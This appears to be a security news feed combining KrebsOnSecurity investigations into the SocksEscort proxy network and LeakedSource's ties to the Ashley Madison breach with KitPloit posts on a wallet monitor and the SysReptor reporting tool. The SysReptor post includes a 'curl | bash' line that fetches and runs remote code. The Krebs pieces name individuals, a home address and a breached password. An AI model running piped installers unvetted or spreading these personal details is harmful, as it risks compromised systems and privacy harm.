Frustratingly, Lumen was not able to determine how the SOHO devices were being infected with AVrecon. Some possible avenues of infection include exploiting weak or default administrative credentials on routers, and outdated, insecure firmware that has known, exploitable security vulnerabilities.


KrebsOnSecurity briefly visited SocksEscort last year and promised a follow-up on the history and possible identity of its proprietors. A review of the earliest posts about this service on Russian cybercrime forums suggests the 12-year-old malware proxy network is tied to a Moldovan company that also offers VPN software on the Apple Store and elsewhere.

SocksEscort began in 2009 as “super-socks[.]com,” a Russian-language service that sold access to thousands of compromised PCs that could be used to proxy traffic. Someone who picked the nicknames “SSC” and “super-socks” and email address “” registered on multiple cybercrime forums and began promoting the proxy service.

According to, the apparently related email address “” was used to register SocksEscort[.]com, super-socks[.]com, and a few other proxy-related domains, including ip-score[.]com, segate[.]org seproxysoft[.]com, and vipssc[.]us. Cached versions of both super-socks[.]com and vipssc[.]us show these sites sold the same proxy service, and both displayed the letters “SSC” prominently at the top of their homepages.

Image: Page translation from Russian via Google Translate.

According to cyber intelligence firm Intel 471, the very first “SSC” identity registered on the cybercrime forums happened in 2009 at the Russian language hacker community Antichat, where SSC asked fellow forum members for help in testing the security of a website they claimed was theirs: myiptest[.]com, which promised to tell visitors whether their proxy address was included on any security or anti-spam block lists.

Myiptest[.]com is no longer responding, but a cached copy of it from shows that for about four years it included in its HTML source a Google Analytics code of US-2665744, which was also present on more than a dozen other websites.

Most of the sites that once bore that Google tracking code are no longer online, but nearly all of them centered around services that were similar to myiptest[.]com, such as abuseipdb[.]com, bestiptest[.]com, checkdnslbl[.]com, dnsbltools[.]com and dnsblmonitor[.]com.

Each of these services were designed to help visitors quickly determine whether the Internet address they were visiting the site from was listed by any security firms as spammy, malicious or phishous. In other words, these services were designed so that proxy service users could easily tell if their rented Internet address was still safe to use for online fraud.

Another domain with the Google Analytics code US-2665744 was sscompany[.]net. An archived copy of the site says SSC stands for “Server Support Company,” which advertised outsourced solutions for technical support and server administration.

Leaked copies of the hacked Antichat forum indicate the SSC identity registered on the forum using the IP address That same IP was used to register the nickname “Deem3n®,” a prolific poster on Antichat between 2005 and 2009 who served as a moderator on the forum.

There was a Deem3n® user on the webmaster forum whose signature in their posts says they run a popular community catering to programmers in Moldova called sysadmin[.]md, and that they were a systems administrator for sscompany[.]net.

That same Google Analytics code is also now present on the homepages of wiremo[.]co and a VPN provider called HideIPVPN[.]com.

Wiremo sells software and services to help website owners better manage their customer reviews. Wiremo’s Contact Us page lists a “Server Management LLC” in Wilmington, DE as the parent company. Server Management LLC is currently listed in Apple’s App Store as the owner of a “free” VPN app called HideIPVPN.

“The best way to secure the transmissions of your mobile device is VPN,” reads HideIPVPN’s description on the Apple Store. “Now, we provide you with an even easier way to connect to our VPN servers. We will hide your IP address, encrypt all your traffic, secure all your sensitive information (passwords, mail credit card details, etc.) form [sic] hackers on public networks.”

When asked about the company’s apparent connection to SocksEscort, Wiremo responded, “We do not control this domain and no one from our team is connected to this domain.” Wiremo did not respond when presented with the findings in this report.

☐ ☆ ✇ KitPloit - PenTest Tools!

Wallet-Transaction-Monitor - This Script Monitors A Bitcoin Wallet Address And Notifies The User When There Are Changes In The Balance Or New Transactions

By: Zion3R — July 25th 2023 at 13:14

This script monitors a Bitcoin wallet address and notifies the user when there are changes in the balance or new transactions. It provides real-time updates on incoming and outgoing transactions, along with the corresponding amounts and timestamps. Additionally, it can play a sound notification on Windows when a new transaction occurs.


    Python 3.x requests library: You can install it by running pip install requests. winsound module: This module is available by default on Windows.

    How to Run

    • Make sure you have Python 3.x installed on your system.
    • pip install -r requirements.txt
    • Clone or download the script file from this repository.
    • Place the sound file (in .wav format) you want to use for the notification in the same directory as the script. Make sure to replace "soundfile.wav" in the script with the actual filename of your sound file.
    • Open a terminal or command prompt and navigate to the directory where the script is located.
    • Run the script by executing the following command:

    The script will start monitoring the wallet and display updates whenever there are changes in the balance or new transactions. It will also play the specified sound notification on Windows.

    Important Notes

    This script is designed to work on Windows due to the use of the winsound module for sound notifications. If you are using a different operating system, you may need to modify the sound-related code or use an alternative method for audio notifications. The script uses the API to fetch wallet data. Please ensure you have a stable internet connection for the script to work correctly. It's recommended to run the script in the background or keep the terminal window open while monitoring the wallet.

    ☐ ☆ ✇ Krebs on Security

    LeakedSource Owner Quit Ashley Madison a Month Before 2015 Hack

    By: BrianKrebs — July 18th 2023 at 14:57

    [This is Part III in a series on research conducted for a recent Hulu documentary on the 2015 hack of marital infidelity website]

    In 2019, a Canadian company called Defiant Tech Inc. pleaded guilty to running LeakedSource[.]com, a service that sold access to billions of passwords and other data exposed in countless data breaches. KrebsOnSecurity has learned that the owner of Defiant Tech, a 32-year-old Ontario man named Jordan Evan Bloom, was hired in late 2014 as a developer for the marital infidelity site Bloom resigned from AshleyMadison citing health reasons in June 2015 — less than one month before unidentified hackers stole data on 37 million users — and launched LeakedSource three months later.

    Jordan Evan Bloom, posing in front of his Lamborghini.

    On Jan. 15, 2018, the Royal Canadian Mounted Police (RCMP) charged then 27-year-old Bloom, of Thornhill, Ontario, with selling stolen personal identities online through the website LeakedSource[.]com.

    LeakedSource was advertised on a number of popular cybercrime forums as a service that could help hackers break into valuable or high-profile accounts. LeakedSource also tried to pass itself off as a legal, legitimate business that was marketing to security firms and professionals.

    The RCMP arrested Bloom in December 2017, and said he made approximately $250,000 selling hacked data, which included information on 37 million user accounts leaked in the 2015 Ashley Madison breach.

    Subsequent press releases from the RCMP about the LeakedSource investigation omitted any mention of Bloom, and referred to the defendant only as Defiant Tech. In a legal settlement that is quintessentially Canadian, the matter was resolved in 2019 after Defiant Tech agreed to plead guilty. The RCMP declined to comment for this story.


    The Impact Team, the hacker group that claimed responsibility for stealing and leaking the AshleyMadison user data, also leaked several years worth of email from then-CEO Noel Biderman. A review of those messages shows that Ashley Madison hired Jordan Evan Bloom as a PHP developer in December 2014 — even though the company understood that Bloom’s success as a programmer and businessman was tied to shady and legally murky enterprises.

    Bloom’s recommendation came to Biderman via Trevor Sykes, then chief technology officer for Ashley Madison parent firm Avid Life Media (ALM). The following is an email from Sykes to Biderman dated Nov. 14, 2014:

    “Greetings Noel,

    “We’d like to offer Jordan Bloom the position of PHP developer reporting to Mike Morris for 75k CAD/Year. He did well on the test, but he also has a great understanding of the business side of things having run small businesses himself. This was an internal referral.”

    When Biderman responded that he needed more information about the candidate, Sykes replied that Bloom was independently wealthy as a result of his forays into the shadowy world of “gold farming”  — the semi-automated use of large numbers of player accounts to win some advantage that is usually related to cashing out game accounts or inventory. Gold farming is particularly prevalent in massively multiplayer online role-playing games (MMORPGs), such as RuneScape and World of Warcraft.

    “In his previous experience he had been doing RMT (Real Money Trading),” Sykes wrote. “This is the practice of selling virtual goods in games for real world money. This is a grey market, which is usually against the terms and services of the game companies.” Here’s the rest of his message to Biderman:

    “RMT sellers traditionally have a lot of problems with chargebacks, and payment processor compliance. During my interview with him, I spent some time focusing in on this. He had to demonstrate to the processor, Paypal, at the time he had a business and technical strategy to address his charge back rate.”

    “He ran this company himself, and did all the coding, including the integration with the processors,” Sykes continued in his assessment of Bloom. “Eventually he was squeezed out by Chinese gold farmers, and their ability to market with much more investment than he could. In addition the cost of ‘farming’ the virtual goods was cheaper in China to do than in North America.”


    The gold farming reference is fascinating because in 2017 KrebsOnSecurity published Who Ran LeakedSource?, which examined clues suggesting that one of the administrators of LeakedSource also was the admin of abusewith[.]us, a site unabashedly dedicated to helping people hack email and online gaming accounts.

    An administrator account Xerx3s on Abusewithus.

    Abusewith[.]us began in September 2013 as a forum for learning and teaching how to hack accounts at Runescape, an MMORPG set in a medieval fantasy realm where players battle for kingdoms and riches.

    The currency with which Runescape players buy and sell weapons, potions and other in-game items are virtual gold coins, and many of Abusewith[dot]us’s early members traded in a handful of commodities: Phishing kits and exploits that could be used to steal Runescape usernames and passwords from fellow players; virtual gold plundered from hacked accounts; and databases from hacked forums and websites related to Runescape and other online games.

    That 2017 report here interviewed a Michigan man who acknowledged being administrator of Abusewith[.]us, but denied being the operator of LeakedSource. Still, the story noted that LeakedSource likely had more than one operator, and breached records show Bloom was a prolific member of Abusewith[.]us.

    In an email to all employees on Dec. 1, 2014, Ashley Madison’s director of HR said Bloom graduated from York University in Toronto with a degree in theoretical physics, and that he has been an active programmer since high school.

    “He’s a proprietor of a high traffic multiplayer game and developer/publisher of utilities such as PicTrace,” the HR director enthused. “He will be a great addition to the team.”

    PicTrace appears to have been a service that allowed users to glean information about anyone who viewed an image hosted on the platform, such as their Internet address, browser type and version number. A copy of pictrace[.]com from in 2012 redirects to the domain, which says was registered to a Jordan Bloom from Thornhill, ON that same year.

    The street address listed in the registration records for — 204 Beverley Glen Blvd — also shows up in the registration records for leakadvisor[.]com, a domain registered in 2017 just months after Canadian authorities seized the servers running LeakedSource.

    Pictrace, one of Jordan Bloom’s early IT successes.

    A review of passive DNS records from DomainTools indicates that in 2013 pictrace[.]com shared a server with just a handful of other domains, including Near-Reality[.]com — a popular RuneScape Private Server (RSPS) game based on the RuneScape MMORPG.

    Copies of near-reality[.]com from 2013 via show the top of the community’s homepage was retrofitted with a message saying Near Reality was no longer available due to a copyright dispute. Although the site doesn’t specify the other party to the copyright dispute, it appears Near-Reality got sued by Jagex, the owner of RuneScape.

    The message goes on to say the website will no longer “encourage, facilitate, enable or condone (i) any infringement of copyright in RuneScape or any other Jagex product; nor (ii) any breach of the terms and conditions of RuneScape or any other Jagex product.”

    A scene from the MMORPG RuneScape.


    Near Reality also has a Facebook page that was last updated in 2019, when its owner posted a link to a news story about Defiant Tech’s guilty plea in the LeakedSource investigation. That Facebook page indicates Bloom also went by the nickname “Agentjags.”

    “Just a quick PSA,” reads a post to the Near Reality Facebook page dated Jan. 21, 2018, which linked to a story about the charges against Bloom and a photo of Bloom standing in front of his lime-green Lamborghini. “Agentjags has got involved in some shady shit that may have compromised your personal details. I advise anyone who is using an old NR [Near Reality] password for anything remotely important should change it ASAP.”

    By the beginning of 2016, Bloom was nowhere to be found, and was suspected of having fled his country for the Caribbean, according to the people commenting on the Near Reality Facebook page:

    “Jordan aka Agentjags has gone missing,” wrote a presumed co-owner of the Facebook page. “He is supposedly hiding in St. Lucia, doing what he loved, scuba-diving. Any information to his whereabouts will be appreciated.”

    KrebsOnSecurity ran the unusual nickname “AgentJags” through a search at Constella Intelligence, a commercial service that tracks breached data sets. That search returned just a few dozen results — and virtually all were accounts at various RuneScape-themed sites, including a half-dozen accounts at Abusewith[.]us.

    Constella found other “AgentJags” accounts tied to the email address The marketing firm experienced a data breach several years back, and according to Apollo the email address belongs to Jordan Bloom in Ontario.

    Constella also revealed that the password frequently used by across many sites was some variation on “niggapls,” which my 2017 report found was also the password used by the administrator of LeakedSource.

    Constella discovered that the email comes up when one searches for “AgentJags.” This is curious because emails leaked from Ashley Madison’s then-CEO Biderman show that Eric Malek from Toronto was the Ashley Madison employee who initially recommended Bloom for the PHP developer job.

    According to, was used to register the domain, which previously advertised “the most exciting developer jobs in Canada, delivered to you weekly.” Constella says also had an account at Abusewith[.]us — under the nickname “Jags.

    Biderman’s email records show Eric Malek was also a PHP developer for Ashley Madison, and that he was hired into this position just a few months before Bloom — on Sept. 2, 2014. The CEO’s leaked emails show Eric Malek resigned from his developer position at Ashley Madison on June 19, 2015.

    “Please note that Eric Malek has resigned from this position with Avid and his last day will be June 19th,” read a June 5, 2015 email from ALM’s HR director. “He is resigning to deal with some personal issues which include health issues. Because he is not sure how much time it will take to resolve, he is not requesting a leave of absence (his time off will be indefinite). Overall, he likes the company and plans to reach out to Trevor or I when the issues are resolved to see what is available at that time.”

    A follow-up email from Biderman demanded, “want to know where he’s truly going….,” and it’s unclear whether there was friction with Malek’s departure. But ALM General Counsel Avi Weisman replied indicating that Malek probably would not sign an “Exit Acknowledgment Form” prior to leaving, and that the company had unanswered questions for Malek.

    “Aneka should dig during exit interview,” Weisman wrote. “Let’s see if he balks at signing the Acknowledgment.”

    Bloom’s departure notice from Ashley Madison’s HR person, dated June 23, 2015, read:

    “Please note that Jordan Bloom has resigned from his position as PHP Developer with Avid. He is leaving for personal reasons. He has a neck issue that will require surgery in the upcoming months and because of his medical appointment schedule and the pain he is experiencing he can no longer commit to a full-time schedule. He may pick up contract work until he is back to 100%.”

    A follow-up note to Biderman about this announcement read:

    “Note that he has disclosed that he is independently wealthy so he can get by without FT work until he is on the mend. He has signed the Exit Acknowledgement Form already without issue. He also says he would consider reapplying to Avid in the future if we have opportunities available at that time.”

    Perhaps Mr. Bloom hurt his neck from craning it around blind spots in his Lamborghini. Maybe it was from a bad scuba outing. Whatever the pain in Bloom’s neck was, it didn’t stop him from launching himself fully into LeakedSource[.]com, which was registered roughly one month after the Impact Team leaked data on 37 million Ashley Madison accounts.

    Mr. Malek declined a request for comment. A now-deleted LinkedIn profile for Malek from December 2018 listed him as a “technical recruiter” from Toronto who also attended Mr. Bloom’s alma mater — York University. That resume did not mention Mr. Malek’s brief stint as a PHP developer at Ashley Madison.

    “Developer, entrepreneur, and now technical recruiter of the most uncommon variety!” Mr. Malek’s LinkedIn profile enthused. “Are you a developer, or other technical specialist, interested in working with a recruiter who can properly understand your concerns and aspirations, technical, environmental and financial? Don’t settle for a ‘hack’; this is your career, let’s do it right! Connect with me on LinkedIn. Note: If you are not a resident of Canada/Toronto, I cannot help you.”


    Mr. Bloom told KrebsOnSecurity he had no role in harming or hacking Ashley Madison. Bloom validated his identity by responding at one of the email addresses mentioned above, and agreed to field questions so long as KrebsOnSecurity agreed to publish our email conversation in full (PDF).

    Bloom said Mr. Malek did recommend him for the Ashley Madison job, but that Mr. Malek also received a $5,000 referral bonus for doing so. Given Mr. Malek’s stated role as a technical recruiter, it seems likely he also recommended several other employees to Ashley Madison.

    Bloom was asked whether anyone at the RCMP, Ashley Madison or any authority anywhere ever questioned him in connection with the July 2015 hack of Ashley Madison. He replied that he was called once by someone claiming to be from the Toronto Police Service asking if he knew anything about the Ashley Madison hack.

    “The AM situation was not something they pursued according to the RCMP disclosure,” Bloom wrote. “Learning about the RCMP’s most advanced cyber investigative techniques and capabilities was very interesting though. I was eventually told information by a third party which included knowledge that law enforcement effectively knew who the hacker was, but didn’t have enough evidence to proceed with a case. That is the extent of my involvement with any authorities.”

    As to his company’s guilty plea for operating LeakedSource, Bloom maintains that the judge at his preliminary inquiry found that even if everything the Canadian government alleged was true it would not constitute a violation of any law in Canada with respect the charges the RCMP leveled against him, which included unauthorized use of a computer and “mischief to data.”

    “In Canada at the lower court level we are allowed to possess stolen information and manipulate our copies of them as we please,” Bloom said. “The judge however decided that a trial was required to determine whether any activities of mine were reckless, as the other qualifier of intentionally criminal didn’t apply. I will note here that nothing I was accused of doing would have been illegal if done in the United States of America according to their District Attorney. +1 for free speech in America vs freedom of expression in Canada.”

    “Shortly after their having most of their case thrown out, the Government proposed an offer during a closed door meeting where they would drop all charges against me, provide full and complete personal immunity, and in exchange the Corporation which has since been dissolved would plead guilty,” Bloom continued. “The Corporation would also pay a modest fine.”

    Bloom said he left Ashley Madison because he was bored, but he acknowledged starting LeakedSource partly in response to the Ashley Madison hack.

    “I intended to leverage my gaming connections to get into security work including for other private servers such as Minecraft communities and others,” Bloom said. “After months of asking management for more interesting tasks, I became bored. Some days I had virtually nothing to do except spin in my chair so I would browse the source code for security holes to fix because I found it enjoyable.”

    “I believe the decision to start LS [LeakedSource] was partly inspired by the AM hack itself, and the large number of people from a former friend group messaging me asking if XYZ person was in the leak after I revealed to them that I downloaded a copy and had the ability to browse it,” Bloom continued. “LS was never my idea – I was just a builder, and the only Canadian. In other countries it was never thought to be illegal on closer examination of their laws.”

    Bloom said he still considers himself independently wealthy, and that still has the lime green Lambo. But he said he’s currently unemployed and can’t seem to land a job in what he views as his most promising career path: Information security.

    “As I’m sure you’re aware, having negative media attention associated with alleged (key word) criminal activity can have a detrimental effect on employment, banking and relationships,” Bloom wrote. “I have no current interest in being a business owner, nor do I have any useful business ideas to be honest. I was and am interested in interesting Information Security/programming work but it’s too large of a risk for any business to hire someone who was formerly accused of a crime.”

    If you liked this story, please consider reading the first two pieces in this series:

    SEO Expert Hired and Fired by Ashley Madison Turned on Company, Promising Revenge

    Top Suspect in 2015 Ashley Madison Hack Committed Suicide in 2014

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    Sysreptor - Fully Customisable, Offensive Security Reporting Tool Designed For Pentesters, Red Teamers And Other Security-Related People Alike

    By: Zion3R — July 14th 2023 at 12:30

    Easy and customisable pentest report creator based on simple web technologies.

    SysReptor is a fully customisable, offensive security reporting tool designed for pentesters, red teamers and other security-related people alike. You can create designs based on simple HTML and CSS, write your reports in user-friendly Markdown and convert them to PDF with just a single click, in the cloud or on-premise!

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    You can then install SysReptor with via script:

    curl -s | bash

    After successful installation, access your application at http://localhost:8000/.

    Get detailed installation instructions at Installation.
